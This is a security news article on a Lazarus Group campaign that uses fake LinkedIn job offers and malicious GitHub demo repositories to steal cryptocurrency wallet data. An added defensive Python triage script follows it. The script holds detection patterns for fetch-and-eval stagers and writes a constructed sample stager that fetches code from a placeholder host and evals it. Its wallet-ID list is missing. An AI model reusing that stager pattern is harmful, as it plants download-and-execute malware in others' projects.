APT Lazarus Targets Cryptocurrency Wallets in New Attack Campaign


According to a recent report from Bitdefender security researchers, the APT Lazarus hacking group is launching a new attack campaign through fake job invitations on LinkedIn, spreading malware that steals information from victims' cryptocurrency wallets.
Lazarus Group, also known as APT38, is a cybercriminal organization believed to be linked to the North Korean government. The group has been responsible for numerous cyberattacks causing significant financial damage in the Asia-Pacific region since 2009. Notably, Vietnam’s Tiên Phong Commercial Joint Stock Bank (TPBank) was once a victim of Lazarus, suffering a loss of approximately $1 million in one of the group’s attacks.
Attack Scenario
The latest campaign was discovered recently when the group attempted to contact a Bitdefender security researcher through the LinkedIn recruitment platform.
The hackers created job listings for a decentralized cryptocurrency exchange. With attractive compensation, flexible working hours, and remote work opportunities, these fake job offers easily lured many victims. Additionally, the hackers also created fraudulent job postings related to the tourism and finance sectors.
The victims go through virtual job interviews, are asked to provide their CVs, and are also required to link their personal repository on GitHub. This is believed to be an information-gathering tactic that also adds legitimacy to the conversation, preventing the victims from becoming suspicious.
After receiving the requested link, the hackers will share a repository containing an MVP (minimum viable product) with the victim while also posing related questions to guide them into executing the corresponding demos.
The code received by the victim initially appears harmless; however, part of it is obfuscated and contains a script that automatically downloads malware from a third party. This malware is designed for cross-platform data theft and can be deployed on Windows, macOS, and Linux. The information stealer specifically targets popular cryptocurrency wallets through browser extensions, identified by the following IDs:
Once deployed on the system, the malware downloads an additional Python file named main99_65.py along with supplementary modules, serving as a foundation for further malicious activities such as deploying a backdoor, a stealer, a keylogger, and data collection. The information it gathers includes:
- Infected machine name
- Username
- Operating system details
- CPU information, including core and thread count
- GPU information
- RAM details
- Public IP address and physical location
Recommendations
The growth of job platforms has made career opportunities more accessible, but it has also introduced risks by enabling cyberattacks that leverage social engineering techniques. Everyone should remain vigilant when receiving unclear or suspicious job offers and should also improve their awareness of cybersecurity threats.
Bitdefender security researchers have highlighted several warning signs and provided the following recommendations:
Warning Signs
- Suspicious job descriptions: Be cautious if there is no corresponding job posting on LinkedIn or if the job description is vague and lacks details.
- Unusual repositories: Watch out for repositories owned by users with randomly generated names, lacking documentation or legitimate contributions.
- Problematic recruiter communication: Red flags include excessive spelling errors, refusal to provide alternative contact methods (such as a company email or phone number), or overly persistent recruitment attempts.
Recommendations
- Do not run unverified code: Use virtual machines, sandboxes, or online platforms to safely analyze any received code.
- Verify authenticity: Cross-check job invitations with official company websites and verify the sender's email domain.
- Stay vigilant: Be extremely cautious when asked to disclose sensitive personal information during job-related communications.
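The article describes the lure as a repository whose code looks harmless while one obfuscated part fetches a payload from a third party and runs it, and it recommends analyzing any received code before executing it. The script below is an added example (not Bitdefender's tooling and not code from the report) of a static pre-flight triage a candidate could run over a cloned "take-home" repository before opening it in a sandbox: it flags files that combine a hard-coded remote fetch with runtime code evaluation, decoding layers, long high-entropy base64 blobs, and the reported drop name main99_65.py. The two sample files it writes are constructed for the demonstration; the host placeholder.invalid and the encoded blob are placeholders, not indicators from the campaign.

```python
"""Static triage of a received repository for download-and-execute stagers (added example)."""
import base64
import math
import re
import tempfile
from collections import Counter
from pathlib import Path

# Heuristic indicators, chosen for this example; only main99_65.py comes from the report.
EVAL_PATTERNS = [re.compile(p) for p in (r"\beval\s*\(", r"\bexec\s*\(", r"\bnew\s+Function\s*\(")]
DOWNLOAD_PATTERNS = [
    re.compile(r"https?://[^\s'\"]+"),  # hard-coded URL
    re.compile(r"\b(?:urlopen|requests\.get|fetch|axios\.get|http\.get|https\.get|curl|wget)\b"),
]
DECODE_PATTERNS = [
    re.compile(r"\b(?:atob|b64decode|Buffer\.from)\s*\("),
    re.compile(r"\\x[0-9a-fA-F]{2}(?:\\x[0-9a-fA-F]{2}){7,}"),  # long hex-escaped string
]
REPORTED_ARTIFACT = re.compile(r"main99_65\.py")  # drop name named in the article
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")
SCAN_SUFFIXES = {".js", ".mjs", ".cjs", ".ts", ".py", ".sh"}
SKIP_DIRS = {"node_modules", ".git", "dist", "build"}


def shannon_entropy(s: str) -> float:
    """Bits per symbol; random base64 approaches 6.0, repetitive text stays low."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def triage_text(text: str) -> dict:
    """Score one file: fetch+eval is the stager shape, obfuscation layers add to it."""
    f = {}
    if any(p.search(text) for p in EVAL_PATTERNS):
        f["runtime_eval"] = True
    if any(p.search(text) for p in DOWNLOAD_PATTERNS):
        f["remote_fetch"] = True
    if any(p.search(text) for p in DECODE_PATTERNS):
        f["decode_layer"] = True
    if any(shannon_entropy(m.group(0)) > 5.0 for m in BASE64_BLOB.finditer(text)):
        f["high_entropy_blob"] = True
    if REPORTED_ARTIFACT.search(text):
        f["reported_artifact_name"] = True
    score = 2 if f.get("remote_fetch") and f.get("runtime_eval") else 0
    score += sum(f.get(k, False) for k in ("decode_layer", "high_entropy_blob", "reported_artifact_name"))
    f["score"] = score
    return f


def triage_repo(root: Path) -> list:
    """Walk the checkout, skipping vendored dirs, and rank files by score (highest first)."""
    results = []
    for path in sorted(root.rglob("*")):
        if any(part in SKIP_DIRS for part in path.parts) or not path.is_file():
            continue
        if path.suffix in SCAN_SUFFIXES:
            f = triage_text(path.read_text(encoding="utf-8", errors="replace"))
            f["path"] = str(path.relative_to(root))
            results.append(f)
    return sorted(results, key=lambda r: r["score"], reverse=True)


def build_sample_repo(root: Path) -> None:
    """Constructed sample: a plausible demo app next to a stager mimicking the described pattern."""
    (root / "src").mkdir(parents=True, exist_ok=True)
    (root / "src" / "server.js").write_text(
        "const express = require('express');\nconst app = express();\n"
        "app.get('/price', async (req, res) => {\n"
        "  const r = await fetch('https://api.example.com/ticker');\n  res.json(await r.json());\n"
        "});\napp.listen(3000);\n"
    )
    blob = base64.b64encode(bytes(range(256))).decode()  # placeholder for an encoded second stage
    (root / "src" / "config.js").write_text(
        "// constructed stager: decode a blob, fetch from a hard-coded host, evaluate the response\n"
        f"const _0x1 = Buffer.from('{blob}', 'base64').toString();\n"
        "require('https').get('http://placeholder.invalid/main99_65.py', r => {\n"
        "  let d = ''; r.on('data', c => d += c); r.on('end', () => eval(d));\n});\n"
    )


def run_demo() -> list:
    """Build the sample repo in a temp dir and return the ranked findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_repo(root)
        return triage_repo(root)


if __name__ == "__main__":
    for r in run_demo():
        print(r["score"], r["path"], sorted(k for k in r if k not in ("score", "path")))
```

Run it against a real checkout with `triage_repo(Path("path/to/clone"))`; anything scoring 2 or more deserves a read in a sandboxed editor before a single `npm install` or `python demo.py`. The heuristics are deliberately coarse: a legitimate build script can fetch a URL, and a legitimate app can decode base64, but the combination of a hard-coded fetch, an evaluation of the response, and decoding layers in a "minimum viable product" is the shape the article describes.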
References
- Bitdefender Anti-Malware Research: https://www.bitdefender.com/en-us/blog/labs/lazarus-group-targets-organizations-with-sophisticated-linkedin-recruiting-scam